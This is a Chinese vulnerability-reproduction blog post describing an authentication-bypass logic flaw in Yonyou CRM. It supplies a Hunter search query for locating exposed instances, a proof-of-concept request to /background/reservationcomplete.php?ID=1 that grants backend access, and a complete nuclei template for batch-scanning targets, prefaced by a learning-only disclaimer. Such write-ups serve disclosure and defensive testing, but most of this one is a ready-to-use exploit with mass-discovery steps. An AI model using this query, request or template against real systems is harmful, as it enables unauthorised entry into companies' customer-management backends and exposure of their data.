【漏洞复现】-用友CRM系统存在逻辑漏洞直接登录后台

免责声明:

本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!!!!

漏洞描述

用友CRM(Customer Relationship Management,客户关系管理)是由用友公司开发的一款软件,专门设计用于帮助企业管理与客户相关的业务活动。这款软件通常包括客户信息管理、销售管理、市场营销、客户服务和技术支持等功能。用友CRM的目标是帮助企业改善与客户的关系,提升客户满意度,优化销售和服务流程,从而提高企业的市场竞争力。它适用于各种规模的企业,可以根据不同企业的具体需求进行定制和扩展。

漏洞名称

用友CRM系统存在逻辑漏洞直接登录后台

漏洞版本

查询语句

hunter语法: app.name="用友 CRM"

漏洞复现

访问poc,回显空白页面

Poc

http://127.0.0.1:9000/background/reservationcomplete.php?ID=1

再次访问原地址,即可直接绕过验证登录后台

nuclei批量检查脚本

id: yongyouU8_CRM-reservationcomplete

info:

name: 用友CRM系统存在逻辑漏洞直接登录后台

author: wy876

severity: high

http:

  • raw:

  • |

GET /background/reservationcomplete.php?ID=1 HTTP/1.1

Host: {{Hostname}}

Connection: close

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)

  • |

GET / HTTP/1.1

Host: {{Hostname}}

Connection: close

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)

matchers:

  • type: dsl

dsl:

  • 'contains(body_2,"\"msg\": \"bgsesstimeout-\", \"serverName\"")'
相关推荐
头茬韭菜5 小时前
4.4 文件编辑安全 — 权限决策与脏写防护的工程实现
安全
Cx330❀6 小时前
【MySQL基础】一文吃透“表的约束”:从 Null/Default 到主外键的终极安全法则
linux·服务器·数据库·c++·mysql·安全
Whoami!6 小时前
⸢ 拾陆-Ⅰ⸥⤳ 安全数智化建设:安全运营中心(SOC)
网络安全·信息安全·soc·安全运营中心
醉颜凉6 小时前
“三把钥匙开一把锁”:多签钱包深度解析与资产安全提升指南
安全·区块链
Haoxuekeji6 小时前
山东 AI 智能批改校园电子阅卷企业
大数据·人工智能·深度学习·安全·ai
程序员JerrySUN6 小时前
Jetson 刷机深度解析:flash.sh vs l4t_initrd_flash.sh(含安全与磁盘加密对比)
linux·网络·arm开发·安全·系统安全
银河麒麟操作系统7 小时前
闸机高效稳跑,通勤提速升级!银河麒麟赋能北京轨交新基建
运维·服务器·安全·交通物流
鹿鸣天涯8 小时前
kali 2026.2 2026年第二个版本发布-新增 9 款工具并优化虚拟机启动性能
安全·web安全·kali
无忧智库8 小时前
中大型企业整体网络安全解决方案:从“边界防火墙”到安全运营闭环(PPT)
安全·web安全
Qimooidea9 小时前
祁木 CAD Translator 工程图纸出海实战指南
服务器·前端·安全